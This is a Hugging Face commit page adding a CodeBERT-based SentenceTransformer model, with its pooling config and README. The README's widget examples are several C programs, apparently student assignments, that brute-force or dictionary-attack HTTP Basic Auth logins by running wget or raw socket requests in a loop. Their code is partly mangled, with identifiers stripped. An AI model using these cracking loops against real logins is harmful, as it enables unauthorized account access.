buelfhood commited on
Commit
0c81473
·
verified ·
1 Parent(s): 00d53ef

Add new SentenceTransformer model

Browse files
1_Pooling/config.json ADDED
@@ -0,0 +1,10 @@
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "word_embedding_dimension": 768,
3
+ "pooling_mode_cls_token": false,
4
+ "pooling_mode_mean_tokens": true,
5
+ "pooling_mode_max_tokens": false,
6
+ "pooling_mode_mean_sqrt_len_tokens": false,
7
+ "pooling_mode_weightedmean_tokens": false,
8
+ "pooling_mode_lasttoken": false,
9
+ "include_prompt": true
10
+ }
README.md ADDED
@@ -0,0 +1,827 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ tags:
3
+ - sentence-transformers
4
+ - sentence-similarity
5
+ - feature-extraction
6
+ - dense
7
+ - generated_from_trainer
8
+ - dataset_size:3081
9
+ - loss:BatchAllTripletLoss
10
+ base_model: microsoft/codebert-base
11
+ widget:
12
+ - source_sentence: "#include <sys/times.h>\n#include <strings.h>\n#include <string.h>\n\
13
+ #include <ctype.h>\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/times.h>\n\
14
+ #include <strings.h>\n#include <string.h>\n#include <ctype.h>\n#include <sys/time.h>\n\
15
+ #define ant 1e9\n\nint ()\n{\nchar c[2],[3][2];\nregister int i,j,k,x,y,z,t,r,s,final,count=0;\n\
16
+ int starttime,endtime,totaltime; \nchar ch[5],ch1[5],ch2[5],s1[100],s2[100];\n\
17
+ c[0]='A',c[1]='a';\n[0][1]=[1][1]=[2][1]='\\0';\n\nstrcpy(s1, \"wget --http-user=\
18
+ \ --http-passwd=\");\n strcpy(s2, \" http://sec-crack.cs.rmit.edu./SEC/2/\"\
19
+ );\n\nstarttime=time();\n\nfor(r=0;r<=1;r++)\n{\n\t\n\tfor(i=c[r],x=0;x<=25;x++,i++)\n\
20
+ \t{\n\t\t\n\t\t [0][0]=i;\n\t\t strcpy(ch,[0]);\n\n\n\t\tfor(s=0;s<=1;s++)\n\t\
21
+ \t{\n\t\t\tfor(j=c[s],z=0;z<=25;z++,j++)\n\t\t\t{\t\n\t\t\n\t\t\t\t[1][0]=j;\n\
22
+ \t\t\t\tstrcpy(ch1,[0]);\n\t\t\t\tstrcat(ch1,[1]);\n\n\t\t\t\tfor(t=0;t<=1;t++)\n\
23
+ \t\t\t\t{\n\t\t\t\t\tfor(k=c[t],y=0;y<=25;y++,k++)\n\t\t\t\t\t{\tcount++;\n\t\t\
24
+ \t\t\t\t[2][0]=k;\n\t\t\t\t\t\tstrcpy(ch2,ch1);\n\t\t\t\t\t\tstrcat(ch2,[2]);\n\
25
+ \t\t\t\t\t\tprintf(\"\\n %s\",ch2);\n\n\n\n strcat(s1, ch2);\n \
26
+ \ strcat(s1, s2);\n\t printf(\"\\n combination sent %s\\n\", s1);\n \
27
+ \ final = system(s1);\n if (final == 0)\n {\n \
28
+ \ endtime=time();\n\t\ttotaltime=(endtime-starttime);\n\t\t printf(\"count %d\"\
29
+ ,count);\n\t printf(\"totaltime %1f\",(double)totaltime/ant);\n\t printf(\"\
30
+ \\nsuccess %s\\n\",ch2);\n exit(1);\n }\n\n\n\t strcpy(s1,\
31
+ \ \"\");\n\t strcpy(s1, \"wget --http-user= --http-passwd=\");\n\n\n\t\t\t\t\
32
+ }\n\n\t\t\t\t}\n\t\t\t}\n\n\t\t}\n\t }\n}\n\n}\n\n\n\n"
33
+ sentences:
34
+ - "\n\n\n\n#include <stdlib.h>\n#include <stdio.h>\n#include <string.h>\n#include\
35
+ \ <time.h>\n#include <netdb.h>\n#include <unistd.h>\n#include <netinet/in.h>\n\
36
+ #include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/time.h>\n#include\
37
+ \ <arpa/inet.h>\n#include <errno.h>\n#include <signal.h>\n\n#define BUFFER_SIZE\
38
+ \ 2000\n#define RETURN_OK 0\n#define RETURN_ERROR 1\n#define TRUE 1\n#define\
39
+ \ FALSE 0\n#define PASSWORD_LENGTH 3\n\n#define STATUS_OK 200\n#define\
40
+ \ STATUS_AUTH_REQUIRED 401\n#define CONN_CLOSED 2\n\n\nchar *host;\n\
41
+ char *filename;\nint ;\nchar *url;\nchar *username;\nint attempt;\nstruct sockaddr_in\
42
+ \ serverAddr;\n\n\nvoid processArguments(int, char **argv, char **, char **);\n\
43
+ void printUsage(char *);\nvoid splitURL(const char *, char **, char **);\nint\
44
+ \ openConnection();\nvoid initialiseConnection();\nvoid sendRequest(int, char\
45
+ \ *, char *, char *, char *);\nint getResponseStatus(int);\nvoid base64_encode(const\
46
+ \ unsigned char *, unsigned char *);\nvoid getHostErrorMsg(char *);\nvoid generatePassword(char\
47
+ \ *, int);\nvoid testPassword(char *);\n\n\n\n\nint main(int argc, char *argv[])\n\
48
+ {\n char password[PASSWORD_LENGTH+1];\n int i;\n\n \n\n attempt =\
49
+ \ 0;\n processArguments(argc, argv, &url, &username);\n splitURL(url, &host,\
50
+ \ &filename);\n\n initialiseConnection();\n = openConnection();\n\n \
51
+ \ \n\n for (i=1; i<=PASSWORD_LENGTH; i++)\n {\n memset(password,\
52
+ \ 0, PASSWORD_LENGTH+1);\n generatePassword(password, i);\n }\n\n \
53
+ \ printf(\"The password has not been cracked\\n\");\n exit(RETURN_OK);\n\n\
54
+ }\n\n\n\n\nvoid generatePassword(char *password, int reqLength)\n{\n static\
55
+ \ const char *chars = \n \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\
56
+ ;\n\n int currLength;\n int i;\n\n currLength = strlen(password);\n \
57
+ \ currLength++;\n\n for (i=0; i<strlen(chars); i++)\n {\n password[currLength-1]\
58
+ \ = chars[i];\n\n if (strlen(password) != reqLength)\n {\n \
59
+ \ \n generatePassword(password, reqLength);\n }\n \
60
+ \ else\n {\n testPassword(password);\n }\n\n password[currLength]\
61
+ \ = '\\0';\n }\n}\n\n\n\n\nvoid testPassword(char *password)\n{\n int status;\n\
62
+ \n attempt++;\n\n \nTestPassword:\n sendRequest(, host, filename, username,\
63
+ \ password);\n status = getResponseStatus();\n\n if (status == STATUS_OK)\n\
64
+ \ {\n printf(\"The password has been found after %d attempts: %s\\n\"\
65
+ ,\n attempt, password);\n exit(RETURN_OK);\n }\n else\
66
+ \ if (status == CONN_CLOSED)\n {\n \n ();\n = openConnection();\n\
67
+ \ goto TestPassword; \n }\n else if (status != STATUS_AUTH_REQUIRED)\n\
68
+ \ {\n printf(\"Status %d received from server\\n\", status);\n \
69
+ \ exit(RETURN_ERROR);\n }\n\n}\n\n\n\n\nvoid processArguments(int argc, char\
70
+ \ *argv[], char **url, char **username)\n{\n if (argc != 3)\n {\n \
71
+ \ printUsage(argv[0]);\n exit(1);\n }\n\n *url = (char *) malloc(strlen(argv[1]\
72
+ \ + 1));\n strcpy(*url, argv[1]);\n\n *username = (char *) malloc(strlen(argv[2]\
73
+ \ + 1));\n strcpy(*username, argv[2]);\n\n}\n\n\n\n\n\nvoid printUsage(char\
74
+ \ *program)\n{\n fprintf(stderr, \"Usage:\\n\");\n fprintf(stderr, \"%s\
75
+ \ url username\\n\", program);\n}\n\n\n\n\nvoid splitURL(const char *url, char\
76
+ \ **host, char **file)\n{\n char *p1; \n char *p2;\n\n \n p1 = strstr(url,\
77
+ \ \"//\");\n if (p1 == NULL)\n p1 = (char *) url;\n else\n \
78
+ \ p1 = p1 + 2;\n\n \n p2 = strstr(p1, \"/\");\n if (p2 == NULL)\n \
79
+ \ {\n fprintf(stderr, \"Invalid url\\n\");\n exit(RETURN_ERROR);\n\
80
+ \ }\n\n *host = (char *) malloc(p2-p1+2);\n strncpy(*host, p1, p2-p1);\n\
81
+ \ (*host)[p2-p1] = '\\0';\n\n *file = (char *) malloc(strlen(p2+1));\n \
82
+ \ strcpy(*file, p2);\n\n}\n\n\n\n\nvoid sendRequest(int , char *host, char *filename,\
83
+ \ char *username, \n char *password)\n{\n char message[BUFFER_SIZE];\n\
84
+ \ unsigned char encoded[BUFFER_SIZE];\n unsigned char token[BUFFER_SIZE];\n\
85
+ \n \n\n \n sprintf((char *) token, \"%s:%s\", username, password);\n\
86
+ \ base64_encode(token, encoded);\n\n sprintf(message, \"GET %s HTTP/1.1\\\
87
+ nHost: %s\\nAuthorization: %s\\n\\n\",\n filename, host, encoded);\n\
88
+ \n if (write(, message, strlen(message)) == -1)\n {\n perror(\"\"\
89
+ );\n exit(RETURN_ERROR);\n }\n}\n\n\n\n\nint getResponseStatus()\n{\n\
90
+ \ char message[BUFFER_SIZE];\n int bytesRead;\n char *p1;\n char\
91
+ \ status_str[4];\n int status;\n\n \n\n while (TRUE)\n {\n \
92
+ \ bytesRead = (, message, BUFFER_SIZE-1);\n if (bytesRead == -1)\n \
93
+ \ {\n perror(\"\");\n exit(RETURN_ERROR);\n }\n\
94
+ \ else if (bytesRead == 0)\n {\n \n return\
95
+ \ CONN_CLOSED;\n }\n\n message[bytesRead+1] = '\\0';\n\n \
96
+ \ \n p1 = strstr(message, \"HTTP\");\n if (p1 != NULL)\n \
97
+ \ {\n p1 = p1 + 9;\n break;\n }\n }\n\n strncpy(status_str,\
98
+ \ p1, 3);\n status_str[3] = '\\0';\n status = atol(status_str);\n\n return\
99
+ \ status;\n}\n\n\n\n\nint openConnection()\n{\n int ;\n\n if (( = socket(AF_INET,\
100
+ \ SOCK_STREAM, 0)) == -1)\n {\n perror(\"\");\n exit(RETURN_ERROR);\n\
101
+ \ }\n\n if (connect(, (struct sockaddr *) &serverAddr, sizeof(serverAddr))\
102
+ \ == -1)\n {\n perror(\"connect\");\n exit(RETURN_ERROR);\n \
103
+ \ }\n\n return ;\n}\n\n\n\n\nvoid initialiseConnection()\n{\n struct hostent\
104
+ \ *serverHostent;\n unsigned serverIP;\n char errorMsg[BUFFER_SIZE]; \n\
105
+ \n\n \n\n memset(&serverAddr, 0, sizeof(serverAddr));\n serverAddr.sin_port\
106
+ \ = htons(80);\n\n\n if ((serverIP = inet_addr(host)) != -1)\n {\n \
107
+ \ serverAddr.sin_family = AF_INET;\n serverAddr.sin_addr.s_addr = serverIP;\n\
108
+ \ }\n else if ((serverHostent = gethostbyname(host)) != NULL)\n {\n\t\
109
+ serverAddr.sin_family = serverHostent->h_addrtype;\n memcpy((void *) &serverAddr.sin_addr,\n\
110
+ \t\t (void *) serverHostent->h_addr, serverHostent->h_length);\n }\n else\n\
111
+ \ {\n getHostErrorMsg(errorMsg);\n printf(\"%s: %s\\n\", host,\
112
+ \ errorMsg);\n exit(RETURN_ERROR);\n }\n}\n\n\n\n \nvoid base64_encode(const\
113
+ \ unsigned char *input, unsigned char *output)\n{\n static const char *codes\
114
+ \ = \n \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\
115
+ ;\n\n int i;\n int len;\n int lenfull;\n unsigned char *p;\n int\
116
+ \ a;\n int b;\n int c;\n \n p = output;\n len = strlen((char *)\
117
+ \ input);\n\n \n\n lenfull = 3*(len / 3);\n for (i = 0; i < lenfull;\
118
+ \ i += 3) \n {\n *p++ = codes[input[0] >> 2];\n *p++ = codes[((input[0]\
119
+ \ & 3) << 4) + (input[1] >> 4)];\n *p++ = codes[((input[1] & 0xf) << 2)\
120
+ \ + (input[2] >> 6)];\n *p++ = codes[input[2] & 0x3f];\n input +=\
121
+ \ 3;\n }\n\n\n \n\n if (i < len)\n {\n a = input[0];\n \
122
+ \ b = (i+1 < len) ? input[1] : 0;\n c = 0;\n\n *p++ = codes[a\
123
+ \ >> 2];\n *p++ = codes[((a & 3) << 4) + (b >> 4)];\n *p++ = (i+1\
124
+ \ < len) ? codes[((b & 0xf) << 2) + (c >> 6)] : '=';\n *p++ = '=';\n \
125
+ \ }\n\n \n *p = '\\0';\n \n}\n\n\n\n\nvoid getHostErrorMsg(char *message)\n\
126
+ {\n switch (h_errno)\n {\n HOST_NOT_FOUND :\n strcpy(message,\
127
+ \ \"The specified host is unknown\");\n break;\n\n NO_DATA:\n\
128
+ \ strcpy(message, \"The specified host name is valid, but does not\
129
+ \ have address\");\n break;\n\n NO_RECOVERY:\n \
130
+ \ strcpy(message, \"A non-recoverable name server error occurred\");\n \
131
+ \ break;\n\n TRY_AGAIN:\n strcpy(message, \"A temporary\
132
+ \ error occurred authoritative name server. Try again later.\");\n \
133
+ \ break;\n\n default:\n strcpy(message, \" unknown name\
134
+ \ server error occurred.\");\n }\n}\n\n"
135
+ - "# include <stdlib.h>\n# include <stdio.h>\n# include <strings.h>\n\n\nint ()\n\
136
+ {\n\t\n\tFILE* fpp;\t\t\t\t\t\t\t\t\t\t\n\tFILE* fp;\n\t\t\t\n\tchar s[100];\n\
137
+ \tint i;\n\t\n\twhile(1)\t\t\t\t\t\t\t\t\t\t\n\t{\n\t\tsystem(\"wget -nv http://www.cs.rmit.edu./students\"\
138
+ );\t\t\t\t\n\t\t\n\t\ti=0;\t\t\n\t\t\n\t\tfp = fopen(\"dummyindex.txt\",\"r\"\
139
+ );\n\t\t\n\t\tif(fp == (FILE*) NULL)\t\t\t\t\t\t\t\t\n\t\t{\n\t\t\tprintf(\" is\
140
+ \ previously saved webpage in the file\\n\");\n\t\t\ti=1;\n\t\t\tfp = fopen(\"\
141
+ dummyindex.txt\",\"w\");\n\n\t\t}\n\t\t\t\t\n\t\tfclose(fp);\n\t\t\n\t\t\t\t\n\
142
+ \t\t\n\t\t\n\t\t\n\t\tsystem(\"diff index.html dummyindex.txt > compareoutput.txt\"\
143
+ );\t\t\n\n\t\t\t\t\n\t\tif(fpp != (FILE*) NULL)\t\n\t\t{\n\t\t\t\n\t\t\tfpp =\
144
+ \ fopen(\"compareoutput.txt\",\"r\");\t\t\t\t\t\n\t\t\t\n\t\t\tfgets(s,100,fpp);\t\
145
+ \t\t\t\t\t\t\n\t\t\t\n\t\t\tfclose(fpp);\t\t\t\t\t\t\t\t\n\t\t\n\t\t\n\t\t \n\
146
+ \t\t\tif((strlen(s)>0) && i==0)\t\t\t\t\t\t\t\t\n\t\t\t{\n\t\t\t\tsystem(\"mail\
147
+ \ @cs.rmit.edu. < compareoutput.txt\");\t\n\t\t\t\tsystem(\"cp index.html dummyindex.txt\"\
148
+ );\t\t\t\t\n\t\t\t\tprintf(\"Message has been sent\\n\");\t\t\t\t\n\t\t\t}\n\t\
149
+ \t\telse\n\t\t\t\tprintf(\" is change in the \\n\");\t\t\t\n\t\t}\n\t\t\n\t\t\
150
+ \n\n\t\tsystem(\"rm index.html\")\t;\t\t\t\t\n\t\t\n\t\tsleep(86400);\t\t\t\t\t\
151
+ \t\t\t\t\n\t}\n\t\t\t\t\n\treturn 1;\n}\n"
152
+ - "#include<stdio.h>\n#include<stdlib.h>\n#include<strings.h>\n#include<ctype.h>\n\
153
+ #include <sys/time.h>\n#define OneBillion 1e9\n\nint ()\n{ int startTime, stopTime,\
154
+ \ final;\n int i,j,k;\n FILE* fp;\n int pass,len;\n int count = 0;\n\
155
+ \ char [50];\n char url1[100];\n char url2[100];\n\n startTime = time();\n\
156
+ \ fp = fopen(\"/usr/share/lib/dict/words\",\"r\");\n while (fp !='\\0')\n\
157
+ \ {\n fgets( ,50,fp);\n\n len = strlen();\n [strlen()-1]\
158
+ \ ='\\0';\n\n if(len <= 4)\n {\n count++;\n\t printf(\"\
159
+ Checking for the word :%s\\n\",);\n\t strcpy(url1 ,\"wget --http-user= --http-passwd=\"\
160
+ );\n\t strcat(url1,);\n\t strcpy(url2 , \" -nv -o output http://sec-crack.cs.rmit.edu./SEC/2/\
161
+ \ \");\n\t strcat(url1,url2);\n\n\n\t pass = system(url1);\n\t if (pass\
162
+ \ == 0)\n\t {\n\t stopTime = time();\n final = stopTime-startTime;\n\
163
+ \t printf(\"\\n SUCCESS\\n\");\n\t printf(\"The password for the user\
164
+ \ : %s\\n \",);\n\t printf(\"Found the password in %lld nanoseconds (%1f\
165
+ \ seconds) \\n\",final,(double)final/OneBillion);\n\t printf(\"Number of\
166
+ \ attempts : %d\\n\",count);\n exit(1);\n\t }\n }\n }\n\n\
167
+ \ }\n"
168
+ - source_sentence: "\n\n#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n\
169
+ #include <unistd.h>\n#include <sys/time.h>\n#include<string.h>\nint ()\n{\nchar\
170
+ \ a[100];\nint count=0;\nchar ch;\nchar line[100];\nchar filename[50];\nchar *token;\n\
171
+ const char delimiter[]=\" \\n.,;:!-\";\nFILE *fp;\nint total_time,start_time,end_time;\n\
172
+ start_time = time();\nstrcpy(filename,\"/usr/share/lib/dict/words\");\nif((fp=fopen(filename,\"\
173
+ r\"))==NULL){\nprintf(\"cannot open file\\n\");\nexit(1);\n}\nwhile((fgets(line,sizeof(line),fp))!=NULL)\n\
174
+ {\n token=strtok(line,delimiter); \n while(token!=NULL)\n \
175
+ \ {\n count++;\n\t printf(\"ATTEMPT : %d\\n\",count);\n\
176
+ strcpy(a,\"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php --http-user= --http-passwd=\"\
177
+ );\n strcat(a,token); \n printf(\"\
178
+ The request %s\\n\",a); \n if(system(a)==0)\n\t\t{\n\t\tprintf(\"\
179
+ Congratulations!!!Password obtained using DICTIONARY ATTACK\\n\");\n\t\tprintf(\"\
180
+ ************************************************************\\n\");\n\t\tprintf(\"\
181
+ Your password is %s\\n\",token);\n\t\tprintf(\"The Request sent is %s \\n\",a);\n\
182
+ \ end_time = time();\n total_time = (end_time -start_time);\n\
183
+ \ total_time /= 1000000000.0;\n printf(\"The Time\
184
+ \ Taken is : %llds\\n\",total_time);\n\t\texit(1);\n\t\t}\n\n \n\
185
+ \ token=strtok(NULL,delimiter);\n \n \
186
+ \ }\n}\n\n\nfclose(fp);\nreturn 0;\n}\n"
187
+ sentences:
188
+ - "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <unistd.h>\n\
189
+ \t\t\t\t \n\n\n#define USERNAME \"\"\n#define URL \"sec-crack.cs.rmit.edu./SEC/2\"\
190
+ \n#define TEST_URL \"yallara.cs.rmit.edu./~/secure\"\n#define MAX_PASSWD_LEN 3\n\
191
+ #define MAX_CHAR_SET 52\n\n#define TRUE 1\n#define FALSE 0\n\n\n\n\n\n\n\n\ntypedef\
192
+ \ int (*CrackFuncPtr)(const char*, const char*);\n\nint runBruteForce(const char\
193
+ \ chSet[], int numOfCh, int len, CrackFuncPtr func);\nchar* initPasswdStr(int\
194
+ \ len, char ch);\nint getChPos(const char chSet[], int numOfCh, char ch);\nint\
195
+ \ pow(int x, int y);\nint crackHTTPAuth(const char *username, const char *passwd);\n\
196
+ \nint ()\n{\n\tchar charSet[] = {'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',\
197
+ \ 'J', 'K',\n\t\t\t\t\t\t\t'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',\
198
+ \ \n\t\t\t\t\t\t\t'W', 'X', 'Y', 'Z',\n\t\t\t\t\t\t\t'a', 'b', 'c', 'd', 'e',\
199
+ \ 'f', 'g', 'h', 'i', 'j', 'k',\n\t\t\t\t\t\t\t'l', 'm', 'n', 'o', 'p', 'q', 'r',\
200
+ \ 's', 't', 'u', 'v', \n\t\t\t\t\t\t\t'w', 'x', 'y', 'z'};\n\t\n\tchar charSetS[]\
201
+ \ = {'A', 'B', 'C'};\n\n\tint i; \n\t\n\tfor (i=1; i<=MAX_PASSWD_LEN; i++)\n\t\
202
+ {\n\t\tif (runBruteForce(charSet, MAX_CHAR_SET, i, crackHTTPAuth))\n\t\t{\n\t\t\
203
+ \treturn 0;\n\t\t}\n\t}\n\n\tprintf(\"\\n...password not found\\n\");\t\t\t\t\t\
204
+ \t\t \t\n\treturn 0;\n}\n\nint runBruteForce(const char chSet[], int numOfCh,\
205
+ \ int len, CrackFuncPtr func)\n{\n\tint iter; \n\tint chIter; \n\tint curPos =\
206
+ \ 0; \n\t\n\tchar *str;\n\t\n\tint passwdFound = FALSE;\n\t\n\tstr = initPasswdStr(len,\
207
+ \ chSet[0]);\n\n\tprintf(\"\\nNow trying %d character(s)\\n\", len);\n\n\n\tfor\
208
+ \ (iter=0; iter<pow(numOfCh, len)&&!passwdFound; iter++)\n\t{\n\t\tfor (chIter=len-1;\
209
+ \ chIter>=0; chIter--)\n\t\t{\n\t\t\tif (iter % pow(numOfCh, chIter) == 0) \n\t\
210
+ \t\t{\n\t\t\t\tcurPos = getChPos(chSet, numOfCh, str[chIter]);\n\t\t\t\tstr[chIter]\
211
+ \ = chSet[curPos+1];\n\t\t\t}\n\n\t\t\tif (iter % pow(numOfCh, (chIter+1)) ==\
212
+ \ 0) \n\t\t\t{\n\t\t\t\tstr[chIter] = chSet[0];\n\t\t\t}\n\t\t}\n\t\t\n\t\tif\
213
+ \ (func(USERNAME, str))\n\t\t{\n\t\t\tprintf(\"\\nPassword found: %s\\n\", str);\n\
214
+ \t\t\tpasswdFound = TRUE;\n\t\t}\n\n\t\t\n\t\tprintf(\".\");\n\t\t\t\t\t\n\t}\n\
215
+ \n\t(str);\n\tstr = NULL;\n\n\treturn passwdFound;\n}\n\nint getChPos(const char\
216
+ \ chSet[], int numOfCh, char ch)\n{\n\tint i;\n\t\n\tfor (i=0; i<numOfCh; i++)\n\
217
+ \t{\n\t\tif (chSet[i] == ch)\n\t\t{\n\t\t\treturn i;\n\t\t}\n\t}\n\n\treturn -1;\n\
218
+ \t\n}\n\nchar* initPasswdStr(int len, char ch)\n{\n\tint i;\n\n\tchar *str;\n\n\
219
+ \tstr = malloc(len);\n\n\tif (str)\n\t{\n\t\tfor (i=0; i<len; i++)\n\t\t{\n\t\t\
220
+ \tstr[i] = ch;\n\t\t}\n\t\tstr[len] = '\\0';\n\t}\n\telse\n\t{\n\t\tfprintf(stderr,\
221
+ \ \"\\nError: Unable allocate %d bytes memory.\");\n\t\texit(1);\n\t}\n\t\n\t\
222
+ return str;\n}\n\nint pow(int x, int y)\n{\n\tint ans = 1, i;\n\t\n\tfor (i=0;\
223
+ \ i<y; i++)\n\t{\n\t\tans *= x;\n\t}\n\n\treturn ans;\n}\n\nint crackHTTPAuth(const\
224
+ \ char *username, const char *passwd)\n{\n\tchar cmd[256];\n\tstruct stat fileInfo;\n\
225
+ \t\n\tsprintf(cmd, \"wget -O -q --http-user=%s --http-passwd=%s --proxy=off %s\"\
226
+ , \n\t\t\t\t\t\tusername, passwd, URL);\n\n\tsystem(cmd);\t\n\n\t(void)stat(\"\
227
+ \", &fileInfo); \n\n\treturn fileInfo.st_size;\n\t\n}\n\n"
228
+ - "#include<stdio.h>\n#include<stdlib.h>\n#include<strings.h>\n#include<ctype.h>\n\
229
+ #include <sys/time.h>\n#define OneBillion 1e9\n\nint ()\n{ int startTime, stopTime,\
230
+ \ final;\n int i,j,k;\n FILE* fp;\n int pass,len;\n int count = 0;\n\
231
+ \ char [50];\n char url1[100];\n char url2[100];\n\n startTime = time();\n\
232
+ \ fp = fopen(\"/usr/share/lib/dict/words\",\"r\");\n while (fp !='\\0')\n\
233
+ \ {\n fgets( ,50,fp);\n\n len = strlen();\n [strlen()-1]\
234
+ \ ='\\0';\n\n if(len <= 4)\n {\n count++;\n\t printf(\"\
235
+ Checking for the word :%s\\n\",);\n\t strcpy(url1 ,\"wget --http-user= --http-passwd=\"\
236
+ );\n\t strcat(url1,);\n\t strcpy(url2 , \" -nv -o output http://sec-crack.cs.rmit.edu./SEC/2/\
237
+ \ \");\n\t strcat(url1,url2);\n\n\n\t pass = system(url1);\n\t if (pass\
238
+ \ == 0)\n\t {\n\t stopTime = time();\n final = stopTime-startTime;\n\
239
+ \t printf(\"\\n SUCCESS\\n\");\n\t printf(\"The password for the user\
240
+ \ : %s\\n \",);\n\t printf(\"Found the password in %lld nanoseconds (%1f\
241
+ \ seconds) \\n\",final,(double)final/OneBillion);\n\t printf(\"Number of\
242
+ \ attempts : %d\\n\",count);\n exit(1);\n\t }\n }\n }\n\n\
243
+ \ }\n"
244
+ - "#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\
245
+ #include <sys/time.h>\n\nint ()\n{\n char lc[53]=\"abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
246
+ ;\n char uc[53]=\"abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n char\
247
+ \ gc[53]=\"abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n int a=0,b=0,c=0,d,e,count=0;\n\
248
+ \ char [100],temp1[100],temp2[100],temp3[100],temp4[10],temp5[50],p[100],q[50],r[50];\n\
249
+ \ char result,result1,result2,mx[100],mx1,mx2,mx3,mx4;\n \n int ,end,t;\n =\
250
+ \ time(); \nwhile(sizeof(lc)!=52)\n{\n temp2[0]=lc[d];\n temp2[1]='\\\
251
+ 0';\n d=d+1;\n strcpy(p,temp2);\n \n while(sizeof(uc)!=52)\n {\n\
252
+ \ temp3[0]=uc[b];\n temp3[1]='\\0';\n b=b+1;\n strcpy(q,p);\n\
253
+ \ strcat(q,temp3);\n for(e=0;e<52;e++)\n {\n temp1[0]=gc[e];\n\
254
+ \ttemp1[1]='\\0';\n\tstrcpy(r,q);\n\tstrcat(r,temp1);\n strcpy(mx,\"wget\
255
+ \ http://sec-crack.cs.rmit.edu./SEC/2 --http-user= --http-passwd=\");\n \
256
+ \ strcat(mx,r);\n printf(\"temp3=%s\\n\",mx);\n if(system(mx)==0)\n\
257
+ \ { \n printf(\"Password=%s\\n\",mx);\n\t printf(\"%d \\n\",count);\n\
258
+ \t end = time();\n t = (end -);\n t /= 1000000000.0;\n \
259
+ \ printf(\"The total time_var taken is:%llds\\n\",t);\n\t exit(1);\n \n\
260
+ \ }\n }\n }\n }\n return 0;\n}\n"
261
+ - source_sentence: "\n\n\n\n\n\n\n\n\n\n\n\n#include<stdio.h>\n#include<stdlib.h>\n\
262
+ #include<strings.h>\n#include<sys/types.h>\n#include<sys/times.h>\n#include<sys/time.h>\n\
263
+ #include<unistd.h>\n\nint ()\n{\n char url[80];\n char syscom[]= \"wget -nv\
264
+ \ --http-user= --http-passwd=\";\n char http[] = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
265
+ ;\n char [] =\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\";\n\n char\
266
+ \ username[8];\n char pass[4];\n int i,j,k,hack=1;\n int attempt = 1;\n int\
267
